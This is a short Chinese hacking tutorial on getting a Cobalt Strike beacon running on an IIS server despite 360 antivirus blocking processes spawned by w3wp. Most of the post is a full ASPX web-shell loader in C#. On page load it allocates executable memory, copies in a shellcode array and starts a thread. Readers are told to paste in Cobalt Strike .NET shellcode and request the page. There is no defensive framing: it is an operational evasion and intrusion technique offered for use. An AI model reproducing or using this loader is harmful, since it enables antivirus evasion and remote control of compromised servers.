绕过360上线cs

月师傅

绕过360上线cs

一、前言

在iis中执行命令会遭到360拦截

也就是说 360会拦截w3wp进程执行的exe文件。

二、绕过

可以使用.net的脚本 加载shellcode代码

1. <%@ Page Language="C#" %>
   
2. <%@ import Namespace="System"%>
   
3. <%@ import Namespace="System.Runtime.InteropServices"%>
   
4. <script language="c#" runat="server">
   
5. [DllImport("kernel32")]
   
6. private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, uint size, uint
   
7. flAllocationType, uint flProtect);
   
8. [DllImport("kernel32")]
   
9. private static extern IntPtr CreateThread(uint lpThreadAttributes,uint
   
10. dwStackSize, IntPtr lpStartAddress,IntPtr param, uint dwCreationFlags, ref uint
    
11. lpThreadId);
    
12. public void Page_Load(object sender, EventArgs e){
    
13. byte[] esc= new byte[928] { shellcode };
    
14. 
    
15. IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (uint)esc.Length, 0x1000, 0x40);
    
16. Marshal.Copy(esc, 0, funcAddr, esc.Length);
    
17. IntPtr hThread = IntPtr.Zero;
    
18. uint threadId = 0;
    
19. IntPtr pinfo = IntPtr.Zero;
    
20. hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
    
21. Response.Write("CreateThread: 0x" + hThread.ToString("x2") + "<br>");
    
22. return;
    
23. }
    
24. </script>

复制代码

用cs生成net shellcode

将shellcoe替换你的cs代码即可。

访问脚本运行cs 成功上线